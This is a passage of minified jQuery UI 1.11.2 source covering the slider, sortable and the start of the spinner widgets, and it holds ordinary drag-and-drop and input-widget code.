i={handle:this.handles[t],value:this.value()};this.options.values&&this.options.values.length&&(i.value=this.values(t),i.values=this.values()),this._trigger("stop",e,i)},_change:function(e,t){if(!this._keySliding&&!this._mouseSliding){var i={handle:this.handles[t],value:this.value()};this.options.values&&this.options.values.length&&(i.value=this.values(t),i.values=this.values()),this._lastChangedValue=t,this._trigger("change",e,i)}},value:function(e){return arguments.length?(this.options.value=this._trimAlignValue(e),this._refreshValue(),this._change(null,0),void 0):this._value()},values:function(t,i){var s,n,a;if(arguments.length>1)return this.options.values[t]=this._trimAlignValue(i),this._refreshValue(),this._change(null,t),void 0;if(!arguments.length)return this._values();if(!e.isArray(arguments[0]))return this.options.values&&this.options.values.length?this._values(t):this.value();for(s=this.options.values,n=arguments[0],a=0;s.length>a;a+=1)s[a]=this._trimAlignValue(n[a]),this._change(null,a);this._refreshValue()},_setOption:function(t,i){var s,n=0;switch("range"===t&&this.options.range===!0&&("min"===i?(this.options.value=this._values(0),this.options.values=null):"max"===i&&(this.options.value=this._values(this.options.values.length-1),this.options.values=null)),e.isArray(this.options.values)&&(n=this.options.values.length),"disabled"===t&&this.element.toggleClass("ui-state-disabled",!!i),this._super(t,i),t){case"orientation":this._detectOrientation(),this.element.removeClass("ui-slider-horizontal ui-slider-vertical").addClass("ui-slider-"+this.orientation),this._refreshValue(),this.handles.css("horizontal"===i?"bottom":"left","");break;case"value":this._animateOff=!0,this._refreshValue(),this._change(null,0),this._animateOff=!1;break;case"values":for(this._animateOff=!0,this._refreshValue(),s=0;n>s;s+=1)this._change(null,s);this._animateOff=!1;break;case"step":case"min":case"max":this._animateOff=!0,this._calculateNewMax(),this._refreshValue(),this._animateOff=!1;break;case"range":this._animateOff=!0,this._refresh(),this._animateOff=!1}},_value:function(){var e=this.options.value;return e=this._trimAlignValue(e)},_values:function(e){var t,i,s;if(arguments.length)return t=this.options.values[e],t=this._trimAlignValue(t);if(this.options.values&&this.options.values.length){for(i=this.options.values.slice(),s=0;i.length>s;s+=1)i[s]=this._trimAlignValue(i[s]);return i}return[]},_trimAlignValue:function(e){if(this._valueMin()>=e)return this._valueMin();if(e>=this._valueMax())return this._valueMax();var t=this.options.step>0?this.options.step:1,i=(e-this._valueMin())%t,s=e-i;return 2*Math.abs(i)>=t&&(s+=i>0?t:-t),parseFloat(s.toFixed(5))},_calculateNewMax:function(){var e=(this.options.max-this._valueMin())%this.options.step;this.max=this.options.max-e},_valueMin:function(){return this.options.min},_valueMax:function(){return this.max},_refreshValue:function(){var t,i,s,n,a,o=this.options.range,r=this.options,h=this,l=this._animateOff?!1:r.animate,u={};this.options.values&&this.options.values.length?this.handles.each(function(s){i=100*((h.values(s)-h._valueMin())/(h._valueMax()-h._valueMin())),u["horizontal"===h.orientation?"left":"bottom"]=i+"%",e(this).stop(1,1)[l?"animate":"css"](u,r.animate),h.options.range===!0&&("horizontal"===h.orientation?(0===s&&h.range.stop(1,1)[l?"animate":"css"]({left:i+"%"},r.animate),1===s&&h.range[l?"animate":"css"]({width:i-t+"%"},{queue:!1,duration:r.animate})):(0===s&&h.range.stop(1,1)[l?"animate":"css"]({bottom:i+"%"},r.animate),1===s&&h.range[l?"animate":"css"]({height:i-t+"%"},{queue:!1,duration:r.animate}))),t=i}):(s=this.value(),n=this._valueMin(),a=this._valueMax(),i=a!==n?100*((s-n)/(a-n)):0,u["horizontal"===this.orientation?"left":"bottom"]=i+"%",this.handle.stop(1,1)[l?"animate":"css"](u,r.animate),"min"===o&&"horizontal"===this.orientation&&this.range.stop(1,1)[l?"animate":"css"]({width:i+"%"},r.animate),"max"===o&&"horizontal"===this.orientation&&this.range[l?"animate":"css"]({width:100-i+"%"},{queue:!1,duration:r.animate}),"min"===o&&"vertical"===this.orientation&&this.range.stop(1,1)[l?"animate":"css"]({height:i+"%"},r.animate),"max"===o&&"vertical"===this.orientation&&this.range[l?"animate":"css"]({height:100-i+"%"},{queue:!1,duration:r.animate}))},_handleEvents:{keydown:function(t){var i,s,n,a,o=e(t.target).data("ui-slider-handle-index");switch(t.keyCode){case e.ui.keyCode.HOME:case e.ui.keyCode.END:case e.ui.keyCode.PAGE_UP:case e.ui.keyCode.PAGE_DOWN:case e.ui.keyCode.UP:case e.ui.keyCode.RIGHT:case e.ui.keyCode.DOWN:case e.ui.keyCode.LEFT:if(t.preventDefault(),!this._keySliding&&(this._keySliding=!0,e(t.target).addClass("ui-state-active"),i=this._start(t,o),i===!1))return}switch(a=this.options.step,s=n=this.options.values&&this.options.values.length?this.values(o):this.value(),t.keyCode){case e.ui.keyCode.HOME:n=this._valueMin();break;case e.ui.keyCode.END:n=this._valueMax();break;case e.ui.keyCode.PAGE_UP:n=this._trimAlignValue(s+(this._valueMax()-this._valueMin())/this.numPages);break;case e.ui.keyCode.PAGE_DOWN:n=this._trimAlignValue(s-(this._valueMax()-this._valueMin())/this.numPages);break;case e.ui.keyCode.UP:case e.ui.keyCode.RIGHT:if(s===this._valueMax())return;n=this._trimAlignValue(s+a);break;case e.ui.keyCode.DOWN:case e.ui.keyCode.LEFT:if(s===this._valueMin())return;n=this._trimAlignValue(s-a)}this._slide(t,o,n)},keyup:function(t){var i=e(t.target).data("ui-slider-handle-index");this._keySliding&&(this._keySliding=!1,this._stop(t,i),this._change(t,i),e(t.target).removeClass("ui-state-active"))}}}),e.widget("ui.sortable",e.ui.mouse,{version:"1.11.2",widgetEventPrefix:"sort",ready:!1,options:{appendTo:"parent",axis:!1,connectWith:!1,containment:!1,cursor:"auto",cursorAt:!1,dropOnEmpty:!0,forcePlaceholderSize:!1,forceHelperSize:!1,grid:!1,handle:!1,helper:"original",items:"> *",opacity:!1,placeholder:!1,revert:!1,scroll:!0,scrollSensitivity:20,scrollSpeed:20,scope:"default",tolerance:"intersect",zIndex:1e3,activate:null,beforeStop:null,change:null,deactivate:null,out:null,over:null,receive:null,remove:null,sort:null,start:null,stop:null,update:null},_isOverAxis:function(e,t,i){return e>=t&&t+i>e},_isFloating:function(e){return/left|right/.test(e.css("float"))||/inline|table-cell/.test(e.css("display"))},_create:function(){var e=this.options;this.containerCache={},this.element.addClass("ui-sortable"),this.refresh(),this.floating=this.items.length?"x"===e.axis||this._isFloating(this.items[0].item):!1,this.offset=this.element.offset(),this._mouseInit(),this._setHandleClassName(),this.ready=!0},_setOption:function(e,t){this._super(e,t),"handle"===e&&this._setHandleClassName()},_setHandleClassName:function(){this.element.find(".ui-sortable-handle").removeClass("ui-sortable-handle"),e.each(this.items,function(){(this.instance.options.handle?this.item.find(this.instance.options.handle):this.item).addClass("ui-sortable-handle")})},_destroy:function(){this.element.removeClass("ui-sortable ui-sortable-disabled").find(".ui-sortable-handle").removeClass("ui-sortable-handle"),this._mouseDestroy();for(var e=this.items.length-1;e>=0;e--)this.items[e].item.removeData(this.widgetName+"-item");return this},_mouseCapture:function(t,i){var s=null,n=!1,a=this;return this.reverting?!1:this.options.disabled||"static"===this.options.type?!1:(this._refreshItems(t),e(t.target).parents().each(function(){return e.data(this,a.widgetName+"-item")===a?(s=e(this),!1):void 0}),e.data(t.target,a.widgetName+"-item")===a&&(s=e(t.target)),s?!this.options.handle||i||(e(this.options.handle,s).find("*").addBack().each(function(){this===t.target&&(n=!0)}),n)?(this.currentItem=s,this._removeCurrentsFromItems(),!0):!1:!1)},_mouseStart:function(t,i,s){var n,a,o=this.options;if(this.currentContainer=this,this.refreshPositions(),this.helper=this._createHelper(t),this._cacheHelperProportions(),this._cacheMargins(),this.scrollParent=this.helper.scrollParent(),this.offset=this.currentItem.offset(),this.offset={top:this.offset.top-this.margins.top,left:this.offset.left-this.margins.left},e.extend(this.offset,{click:{left:t.pageX-this.offset.left,top:t.pageY-this.offset.top},parent:this._getParentOffset(),relative:this._getRelativeOffset()}),this.helper.css("position","absolute"),this.cssPosition=this.helper.css("position"),this.originalPosition=this._generatePosition(t),this.originalPageX=t.pageX,this.originalPageY=t.pageY,o.cursorAt&&this._adjustOffsetFromHelper(o.cursorAt),this.domPosition={prev:this.currentItem.prev()[0],parent:this.currentItem.parent()[0]},this.helper[0]!==this.currentItem[0]&&this.currentItem.hide(),this._createPlaceholder(),o.containment&&this._setContainment(),o.cursor&&"auto"!==o.cursor&&(a=this.document.find("body"),this.storedCursor=a.css("cursor"),a.css("cursor",o.cursor),this.storedStylesheet=e("<style>*{ cursor: "+o.cursor+" !important; }</style>").appendTo(a)),o.opacity&&(this.helper.css("opacity")&&(this._storedOpacity=this.helper.css("opacity")),this.helper.css("opacity",o.opacity)),o.zIndex&&(this.helper.css("zIndex")&&(this._storedZIndex=this.helper.css("zIndex")),this.helper.css("zIndex",o.zIndex)),this.scrollParent[0]!==document&&"HTML"!==this.scrollParent[0].tagName&&(this.overflowOffset=this.scrollParent.offset()),this._trigger("start",t,this._uiHash()),this._preserveHelperProportions||this._cacheHelperProportions(),!s)for(n=this.containers.length-1;n>=0;n--)this.containers[n]._trigger("activate",t,this._uiHash(this));
return e.ui.ddmanager&&(e.ui.ddmanager.current=this),e.ui.ddmanager&&!o.dropBehaviour&&e.ui.ddmanager.prepareOffsets(this,t),this.dragging=!0,this.helper.addClass("ui-sortable-helper"),this._mouseDrag(t),!0},_mouseDrag:function(t){var i,s,n,a,o=this.options,r=!1;for(this.position=this._generatePosition(t),this.positionAbs=this._convertPositionTo("absolute"),this.lastPositionAbs||(this.lastPositionAbs=this.positionAbs),this.options.scroll&&(this.scrollParent[0]!==document&&"HTML"!==this.scrollParent[0].tagName?(this.overflowOffset.top+this.scrollParent[0].offsetHeight-t.pageY<o.scrollSensitivity?this.scrollParent[0].scrollTop=r=this.scrollParent[0].scrollTop+o.scrollSpeed:t.pageY-this.overflowOffset.top<o.scrollSensitivity&&(this.scrollParent[0].scrollTop=r=this.scrollParent[0].scrollTop-o.scrollSpeed),this.overflowOffset.left+this.scrollParent[0].offsetWidth-t.pageX<o.scrollSensitivity?this.scrollParent[0].scrollLeft=r=this.scrollParent[0].scrollLeft+o.scrollSpeed:t.pageX-this.overflowOffset.left<o.scrollSensitivity&&(this.scrollParent[0].scrollLeft=r=this.scrollParent[0].scrollLeft-o.scrollSpeed)):(t.pageY-e(document).scrollTop()<o.scrollSensitivity?r=e(document).scrollTop(e(document).scrollTop()-o.scrollSpeed):e(window).height()-(t.pageY-e(document).scrollTop())<o.scrollSensitivity&&(r=e(document).scrollTop(e(document).scrollTop()+o.scrollSpeed)),t.pageX-e(document).scrollLeft()<o.scrollSensitivity?r=e(document).scrollLeft(e(document).scrollLeft()-o.scrollSpeed):e(window).width()-(t.pageX-e(document).scrollLeft())<o.scrollSensitivity&&(r=e(document).scrollLeft(e(document).scrollLeft()+o.scrollSpeed))),r!==!1&&e.ui.ddmanager&&!o.dropBehaviour&&e.ui.ddmanager.prepareOffsets(this,t)),this.positionAbs=this._convertPositionTo("absolute"),this.options.axis&&"y"===this.options.axis||(this.helper[0].style.left=this.position.left+"px"),this.options.axis&&"x"===this.options.axis||(this.helper[0].style.top=this.position.top+"px"),i=this.items.length-1;i>=0;i--)if(s=this.items[i],n=s.item[0],a=this._intersectsWithPointer(s),a&&s.instance===this.currentContainer&&n!==this.currentItem[0]&&this.placeholder[1===a?"next":"prev"]()[0]!==n&&!e.contains(this.placeholder[0],n)&&("semi-dynamic"===this.options.type?!e.contains(this.element[0],n):!0)){if(this.direction=1===a?"down":"up","pointer"!==this.options.tolerance&&!this._intersectsWithSides(s))break;this._rearrange(t,s),this._trigger("change",t,this._uiHash());break}return this._contactContainers(t),e.ui.ddmanager&&e.ui.ddmanager.drag(this,t),this._trigger("sort",t,this._uiHash()),this.lastPositionAbs=this.positionAbs,!1},_mouseStop:function(t,i){if(t){if(e.ui.ddmanager&&!this.options.dropBehaviour&&e.ui.ddmanager.drop(this,t),this.options.revert){var s=this,n=this.placeholder.offset(),a=this.options.axis,o={};a&&"x"!==a||(o.left=n.left-this.offset.parent.left-this.margins.left+(this.offsetParent[0]===document.body?0:this.offsetParent[0].scrollLeft)),a&&"y"!==a||(o.top=n.top-this.offset.parent.top-this.margins.top+(this.offsetParent[0]===document.body?0:this.offsetParent[0].scrollTop)),this.reverting=!0,e(this.helper).animate(o,parseInt(this.options.revert,10)||500,function(){s._clear(t)})}else this._clear(t,i);return!1}},cancel:function(){if(this.dragging){this._mouseUp({target:null}),"original"===this.options.helper?this.currentItem.css(this._storedCSS).removeClass("ui-sortable-helper"):this.currentItem.show();for(var t=this.containers.length-1;t>=0;t--)this.containers[t]._trigger("deactivate",null,this._uiHash(this)),this.containers[t].containerCache.over&&(this.containers[t]._trigger("out",null,this._uiHash(this)),this.containers[t].containerCache.over=0)}return this.placeholder&&(this.placeholder[0].parentNode&&this.placeholder[0].parentNode.removeChild(this.placeholder[0]),"original"!==this.options.helper&&this.helper&&this.helper[0].parentNode&&this.helper.remove(),e.extend(this,{helper:null,dragging:!1,reverting:!1,_noFinalSort:null}),this.domPosition.prev?e(this.domPosition.prev).after(this.currentItem):e(this.domPosition.parent).prepend(this.currentItem)),this},serialize:function(t){var i=this._getItemsAsjQuery(t&&t.connected),s=[];return t=t||{},e(i).each(function(){var i=(e(t.item||this).attr(t.attribute||"id")||"").match(t.expression||/(.+)[\-=_](.+)/);i&&s.push((t.key||i[1]+"[]")+"="+(t.key&&t.expression?i[1]:i[2]))}),!s.length&&t.key&&s.push(t.key+"="),s.join("&")},toArray:function(t){var i=this._getItemsAsjQuery(t&&t.connected),s=[];return t=t||{},i.each(function(){s.push(e(t.item||this).attr(t.attribute||"id")||"")}),s},_intersectsWith:function(e){var t=this.positionAbs.left,i=t+this.helperProportions.width,s=this.positionAbs.top,n=s+this.helperProportions.height,a=e.left,o=a+e.width,r=e.top,h=r+e.height,l=this.offset.click.top,u=this.offset.click.left,d="x"===this.options.axis||s+l>r&&h>s+l,c="y"===this.options.axis||t+u>a&&o>t+u,p=d&&c;return"pointer"===this.options.tolerance||this.options.forcePointerForContainers||"pointer"!==this.options.tolerance&&this.helperProportions[this.floating?"width":"height"]>e[this.floating?"width":"height"]?p:t+this.helperProportions.width/2>a&&o>i-this.helperProportions.width/2&&s+this.helperProportions.height/2>r&&h>n-this.helperProportions.height/2},_intersectsWithPointer:function(e){var t="x"===this.options.axis||this._isOverAxis(this.positionAbs.top+this.offset.click.top,e.top,e.height),i="y"===this.options.axis||this._isOverAxis(this.positionAbs.left+this.offset.click.left,e.left,e.width),s=t&&i,n=this._getDragVerticalDirection(),a=this._getDragHorizontalDirection();return s?this.floating?a&&"right"===a||"down"===n?2:1:n&&("down"===n?2:1):!1},_intersectsWithSides:function(e){var t=this._isOverAxis(this.positionAbs.top+this.offset.click.top,e.top+e.height/2,e.height),i=this._isOverAxis(this.positionAbs.left+this.offset.click.left,e.left+e.width/2,e.width),s=this._getDragVerticalDirection(),n=this._getDragHorizontalDirection();return this.floating&&n?"right"===n&&i||"left"===n&&!i:s&&("down"===s&&t||"up"===s&&!t)},_getDragVerticalDirection:function(){var e=this.positionAbs.top-this.lastPositionAbs.top;return 0!==e&&(e>0?"down":"up")},_getDragHorizontalDirection:function(){var e=this.positionAbs.left-this.lastPositionAbs.left;return 0!==e&&(e>0?"right":"left")},refresh:function(e){return this._refreshItems(e),this._setHandleClassName(),this.refreshPositions(),this},_connectWith:function(){var e=this.options;return e.connectWith.constructor===String?[e.connectWith]:e.connectWith},_getItemsAsjQuery:function(t){function i(){r.push(this)}var s,n,a,o,r=[],h=[],l=this._connectWith();if(l&&t)for(s=l.length-1;s>=0;s--)for(a=e(l[s]),n=a.length-1;n>=0;n--)o=e.data(a[n],this.widgetFullName),o&&o!==this&&!o.options.disabled&&h.push([e.isFunction(o.options.items)?o.options.items.call(o.element):e(o.options.items,o.element).not(".ui-sortable-helper").not(".ui-sortable-placeholder"),o]);for(h.push([e.isFunction(this.options.items)?this.options.items.call(this.element,null,{options:this.options,item:this.currentItem}):e(this.options.items,this.element).not(".ui-sortable-helper").not(".ui-sortable-placeholder"),this]),s=h.length-1;s>=0;s--)h[s][0].each(i);return e(r)},_removeCurrentsFromItems:function(){var t=this.currentItem.find(":data("+this.widgetName+"-item)");this.items=e.grep(this.items,function(e){for(var i=0;t.length>i;i++)if(t[i]===e.item[0])return!1;return!0})},_refreshItems:function(t){this.items=[],this.containers=[this];var i,s,n,a,o,r,h,l,u=this.items,d=[[e.isFunction(this.options.items)?this.options.items.call(this.element[0],t,{item:this.currentItem}):e(this.options.items,this.element),this]],c=this._connectWith();if(c&&this.ready)for(i=c.length-1;i>=0;i--)for(n=e(c[i]),s=n.length-1;s>=0;s--)a=e.data(n[s],this.widgetFullName),a&&a!==this&&!a.options.disabled&&(d.push([e.isFunction(a.options.items)?a.options.items.call(a.element[0],t,{item:this.currentItem}):e(a.options.items,a.element),a]),this.containers.push(a));for(i=d.length-1;i>=0;i--)for(o=d[i][1],r=d[i][0],s=0,l=r.length;l>s;s++)h=e(r[s]),h.data(this.widgetName+"-item",o),u.push({item:h,instance:o,width:0,height:0,left:0,top:0})},refreshPositions:function(t){this.offsetParent&&this.helper&&(this.offset.parent=this._getParentOffset());var i,s,n,a;for(i=this.items.length-1;i>=0;i--)s=this.items[i],s.instance!==this.currentContainer&&this.currentContainer&&s.item[0]!==this.currentItem[0]||(n=this.options.toleranceElement?e(this.options.toleranceElement,s.item):s.item,t||(s.width=n.outerWidth(),s.height=n.outerHeight()),a=n.offset(),s.left=a.left,s.top=a.top);if(this.options.custom&&this.options.custom.refreshContainers)this.options.custom.refreshContainers.call(this);else for(i=this.containers.length-1;i>=0;i--)a=this.containers[i].element.offset(),this.containers[i].containerCache.left=a.left,this.containers[i].containerCache.top=a.top,this.containers[i].containerCache.width=this.containers[i].element.outerWidth(),this.containers[i].containerCache.height=this.containers[i].element.outerHeight();return this},_createPlaceholder:function(t){t=t||this;var i,s=t.options;s.placeholder&&s.placeholder.constructor!==String||(i=s.placeholder,s.placeholder={element:function(){var s=t.currentItem[0].nodeName.toLowerCase(),n=e("<"+s+">",t.document[0]).addClass(i||t.currentItem[0].className+" ui-sortable-placeholder").removeClass("ui-sortable-helper");return"tr"===s?t.currentItem.children().each(function(){e("<td>&#160;</td>",t.document[0]).attr("colspan",e(this).attr("colspan")||1).appendTo(n)}):"img"===s&&n.attr("src",t.currentItem.attr("src")),i||n.css("visibility","hidden"),n},update:function(e,n){(!i||s.forcePlaceholderSize)&&(n.height()||n.height(t.currentItem.innerHeight()-parseInt(t.currentItem.css("paddingTop")||0,10)-parseInt(t.currentItem.css("paddingBottom")||0,10)),n.width()||n.width(t.currentItem.innerWidth()-parseInt(t.currentItem.css("paddingLeft")||0,10)-parseInt(t.currentItem.css("paddingRight")||0,10)))}}),t.placeholder=e(s.placeholder.element.call(t.element,t.currentItem)),t.currentItem.after(t.placeholder),s.placeholder.update(t,t.placeholder)},_contactContainers:function(t){var i,s,n,a,o,r,h,l,u,d,c=null,p=null;for(i=this.containers.length-1;i>=0;i--)if(!e.contains(this.currentItem[0],this.containers[i].element[0]))if(this._intersectsWith(this.containers[i].containerCache)){if(c&&e.contains(this.containers[i].element[0],c.element[0]))continue;c=this.containers[i],p=i}else this.containers[i].containerCache.over&&(this.containers[i]._trigger("out",t,this._uiHash(this)),this.containers[i].containerCache.over=0);if(c)if(1===this.containers.length)this.containers[p].containerCache.over||(this.containers[p]._trigger("over",t,this._uiHash(this)),this.containers[p].containerCache.over=1);else{for(n=1e4,a=null,u=c.floating||this._isFloating(this.currentItem),o=u?"left":"top",r=u?"width":"height",d=u?"clientX":"clientY",s=this.items.length-1;s>=0;s--)e.contains(this.containers[p].element[0],this.items[s].item[0])&&this.items[s].item[0]!==this.currentItem[0]&&(h=this.items[s].item.offset()[o],l=!1,t[d]-h>this.items[s][r]/2&&(l=!0),n>Math.abs(t[d]-h)&&(n=Math.abs(t[d]-h),a=this.items[s],this.direction=l?"up":"down"));if(!a&&!this.options.dropOnEmpty)return;if(this.currentContainer===this.containers[p])return this.currentContainer.containerCache.over||(this.containers[p]._trigger("over",t,this._uiHash()),this.currentContainer.containerCache.over=1),void 0;a?this._rearrange(t,a,null,!0):this._rearrange(t,null,this.containers[p].element,!0),this._trigger("change",t,this._uiHash()),this.containers[p]._trigger("change",t,this._uiHash(this)),this.currentContainer=this.containers[p],this.options.placeholder.update(this.currentContainer,this.placeholder),this.containers[p]._trigger("over",t,this._uiHash(this)),this.containers[p].containerCache.over=1}},_createHelper:function(t){var i=this.options,s=e.isFunction(i.helper)?e(i.helper.apply(this.element[0],[t,this.currentItem])):"clone"===i.helper?this.currentItem.clone():this.currentItem;return s.parents("body").length||e("parent"!==i.appendTo?i.appendTo:this.currentItem[0].parentNode)[0].appendChild(s[0]),s[0]===this.currentItem[0]&&(this._storedCSS={width:this.currentItem[0].style.width,height:this.currentItem[0].style.height,position:this.currentItem.css("position"),top:this.currentItem.css("top"),left:this.currentItem.css("left")}),(!s[0].style.width||i.forceHelperSize)&&s.width(this.currentItem.width()),(!s[0].style.height||i.forceHelperSize)&&s.height(this.currentItem.height()),s},_adjustOffsetFromHelper:function(t){"string"==typeof t&&(t=t.split(" ")),e.isArray(t)&&(t={left:+t[0],top:+t[1]||0}),"left"in t&&(this.offset.click.left=t.left+this.margins.left),"right"in t&&(this.offset.click.left=this.helperProportions.width-t.right+this.margins.left),"top"in t&&(this.offset.click.top=t.top+this.margins.top),"bottom"in t&&(this.offset.click.top=this.helperProportions.height-t.bottom+this.margins.top)},_getParentOffset:function(){this.offsetParent=this.helper.offsetParent();var t=this.offsetParent.offset();return"absolute"===this.cssPosition&&this.scrollParent[0]!==document&&e.contains(this.scrollParent[0],this.offsetParent[0])&&(t.left+=this.scrollParent.scrollLeft(),t.top+=this.scrollParent.scrollTop()),(this.offsetParent[0]===document.body||this.offsetParent[0].tagName&&"html"===this.offsetParent[0].tagName.toLowerCase()&&e.ui.ie)&&(t={top:0,left:0}),{top:t.top+(parseInt(this.offsetParent.css("borderTopWidth"),10)||0),left:t.left+(parseInt(this.offsetParent.css("borderLeftWidth"),10)||0)}},_getRelativeOffset:function(){if("relative"===this.cssPosition){var e=this.currentItem.position();return{top:e.top-(parseInt(this.helper.css("top"),10)||0)+this.scrollParent.scrollTop(),left:e.left-(parseInt(this.helper.css("left"),10)||0)+this.scrollParent.scrollLeft()}}return{top:0,left:0}},_cacheMargins:function(){this.margins={left:parseInt(this.currentItem.css("marginLeft"),10)||0,top:parseInt(this.currentItem.css("marginTop"),10)||0}},_cacheHelperProportions:function(){this.helperProportions={width:this.helper.outerWidth(),height:this.helper.outerHeight()}},_setContainment:function(){var t,i,s,n=this.options;"parent"===n.containment&&(n.containment=this.helper[0].parentNode),("document"===n.containment||"window"===n.containment)&&(this.containment=[0-this.offset.relative.left-this.offset.parent.left,0-this.offset.relative.top-this.offset.parent.top,e("document"===n.containment?document:window).width()-this.helperProportions.width-this.margins.left,(e("document"===n.containment?document:window).height()||document.body.parentNode.scrollHeight)-this.helperProportions.height-this.margins.top]),/^(document|window|parent)$/.test(n.containment)||(t=e(n.containment)[0],i=e(n.containment).offset(),s="hidden"!==e(t).css("overflow"),this.containment=[i.left+(parseInt(e(t).css("borderLeftWidth"),10)||0)+(parseInt(e(t).css("paddingLeft"),10)||0)-this.margins.left,i.top+(parseInt(e(t).css("borderTopWidth"),10)||0)+(parseInt(e(t).css("paddingTop"),10)||0)-this.margins.top,i.left+(s?Math.max(t.scrollWidth,t.offsetWidth):t.offsetWidth)-(parseInt(e(t).css("borderLeftWidth"),10)||0)-(parseInt(e(t).css("paddingRight"),10)||0)-this.helperProportions.width-this.margins.left,i.top+(s?Math.max(t.scrollHeight,t.offsetHeight):t.offsetHeight)-(parseInt(e(t).css("borderTopWidth"),10)||0)-(parseInt(e(t).css("paddingBottom"),10)||0)-this.helperProportions.height-this.margins.top])},_convertPositionTo:function(t,i){i||(i=this.position);var s="absolute"===t?1:-1,n="absolute"!==this.cssPosition||this.scrollParent[0]!==document&&e.contains(this.scrollParent[0],this.offsetParent[0])?this.scrollParent:this.offsetParent,a=/(html|body)/i.test(n[0].tagName);return{top:i.top+this.offset.relative.top*s+this.offset.parent.top*s-("fixed"===this.cssPosition?-this.scrollParent.scrollTop():a?0:n.scrollTop())*s,left:i.left+this.offset.relative.left*s+this.offset.parent.left*s-("fixed"===this.cssPosition?-this.scrollParent.scrollLeft():a?0:n.scrollLeft())*s}},_generatePosition:function(t){var i,s,n=this.options,a=t.pageX,o=t.pageY,r="absolute"!==this.cssPosition||this.scrollParent[0]!==document&&e.contains(this.scrollParent[0],this.offsetParent[0])?this.scrollParent:this.offsetParent,h=/(html|body)/i.test(r[0].tagName);return"relative"!==this.cssPosition||this.scrollParent[0]!==document&&this.scrollParent[0]!==this.offsetParent[0]||(this.offset.relative=this._getRelativeOffset()),this.originalPosition&&(this.containment&&(t.pageX-this.offset.click.left<this.containment[0]&&(a=this.containment[0]+this.offset.click.left),t.pageY-this.offset.click.top<this.containment[1]&&(o=this.containment[1]+this.offset.click.top),t.pageX-this.offset.click.left>this.containment[2]&&(a=this.containment[2]+this.offset.click.left),t.pageY-this.offset.click.top>this.containment[3]&&(o=this.containment[3]+this.offset.click.top)),n.grid&&(i=this.originalPageY+Math.round((o-this.originalPageY)/n.grid[1])*n.grid[1],o=this.containment?i-this.offset.click.top>=this.containment[1]&&i-this.offset.click.top<=this.containment[3]?i:i-this.offset.click.top>=this.containment[1]?i-n.grid[1]:i+n.grid[1]:i,s=this.originalPageX+Math.round((a-this.originalPageX)/n.grid[0])*n.grid[0],a=this.containment?s-this.offset.click.left>=this.containment[0]&&s-this.offset.click.left<=this.containment[2]?s:s-this.offset.click.left>=this.containment[0]?s-n.grid[0]:s+n.grid[0]:s)),{top:o-this.offset.click.top-this.offset.relative.top-this.offset.parent.top+("fixed"===this.cssPosition?-this.scrollParent.scrollTop():h?0:r.scrollTop()),left:a-this.offset.click.left-this.offset.relative.left-this.offset.parent.left+("fixed"===this.cssPosition?-this.scrollParent.scrollLeft():h?0:r.scrollLeft())}},_rearrange:function(e,t,i,s){i?i[0].appendChild(this.placeholder[0]):t.item[0].parentNode.insertBefore(this.placeholder[0],"down"===this.direction?t.item[0]:t.item[0].nextSibling),this.counter=this.counter?++this.counter:1;var n=this.counter;this._delay(function(){n===this.counter&&this.refreshPositions(!s)})},_clear:function(e,t){function i(e,t,i){return function(s){i._trigger(e,s,t._uiHash(t))}}this.reverting=!1;var s,n=[];if(!this._noFinalSort&&this.currentItem.parent().length&&this.placeholder.before(this.currentItem),this._noFinalSort=null,this.helper[0]===this.currentItem[0]){for(s in this._storedCSS)("auto"===this._storedCSS[s]||"static"===this._storedCSS[s])&&(this._storedCSS[s]="");this.currentItem.css(this._storedCSS).removeClass("ui-sortable-helper")}else this.currentItem.show();for(this.fromOutside&&!t&&n.push(function(e){this._trigger("receive",e,this._uiHash(this.fromOutside))}),!this.fromOutside&&this.domPosition.prev===this.currentItem.prev().not(".ui-sortable-helper")[0]&&this.domPosition.parent===this.currentItem.parent()[0]||t||n.push(function(e){this._trigger("update",e,this._uiHash())}),this!==this.currentContainer&&(t||(n.push(function(e){this._trigger("remove",e,this._uiHash())}),n.push(function(e){return function(t){e._trigger("receive",t,this._uiHash(this))}}.call(this,this.currentContainer)),n.push(function(e){return function(t){e._trigger("update",t,this._uiHash(this))}}.call(this,this.currentContainer)))),s=this.containers.length-1;s>=0;s--)t||n.push(i("deactivate",this,this.containers[s])),this.containers[s].containerCache.over&&(n.push(i("out",this,this.containers[s])),this.containers[s].containerCache.over=0);if(this.storedCursor&&(this.document.find("body").css("cursor",this.storedCursor),this.storedStylesheet.remove()),this._storedOpacity&&this.helper.css("opacity",this._storedOpacity),this._storedZIndex&&this.helper.css("zIndex","auto"===this._storedZIndex?"":this._storedZIndex),this.dragging=!1,t||this._trigger("beforeStop",e,this._uiHash()),this.placeholder[0].parentNode.removeChild(this.placeholder[0]),this.cancelHelperRemoval||(this.helper[0]!==this.currentItem[0]&&this.helper.remove(),this.helper=null),!t){for(s=0;n.length>s;s++)n[s].call(this,e);this._trigger("stop",e,this._uiHash())}return this.fromOutside=!1,!this.cancelHelperRemoval},_trigger:function(){e.Widget.prototype._trigger.apply(this,arguments)===!1&&this.cancel()},_uiHash:function(t){var i=t||this;return{helper:i.helper,placeholder:i.placeholder||e([]),position:i.position,originalPosition:i.originalPosition,offset:i.positionAbs,item:i.currentItem,sender:t?t.element:null}}}),e.widget("ui.spinner",{version:"1.11.2",defaultElement:"<input>",widgetEventPrefix:"spin",options:{culture:null,icons:{down:"ui-icon-triangle-1-s",up:"ui-icon-triangle-1-n"},incremental:!0,max:null,min:null,numberFormat:null,page:10,step:1,change:null,spin:null,start:null,stop:null},_create:function(){this._setOption("max",this.options.max),this._setOption("min",this.options.min),this._setOption("step",this.options.step),""!==this.value()&&this._value(this.element.val(),!0),this._draw(),this._on(this._events),this._refresh(),this._on(this.window,{beforeunload:function(){this.element.removeAttr("autocomplete")}})},_getCreateOptions:function(){var t={},i=this.element;return e.each(["min","max","step"],function(e,s){var n=i.attr(s);void 0!==n&&n.length&&(t[s]=n)}),t},_events:{keydown:function(e){this._start(e)&&this._keydown(e)&&e.preventDefault()},keyup:"_stop",focus:function(){this.previous=this.element.val()},blur:function(e){return this.cancelBlur?(delete this.cancelBlur,void 0):(this._stop(),this._refresh(),this.previous!==this.element.val()&&this._trigger("change",e),void 0)},mousewheel:function(e,t){if(t){if(!this.spinning&&!this._start(e))return!1;this._spin((t>0?1:-1)*this.options.step,e),clearTimeout(this.mousewheelTimer),this.mousewheelTimer=this._delay(function(){this.spinning&&this._stop(e)},100),e.preventDefault()}},"mousedown .ui-spinner-button":function(t){function i(){var 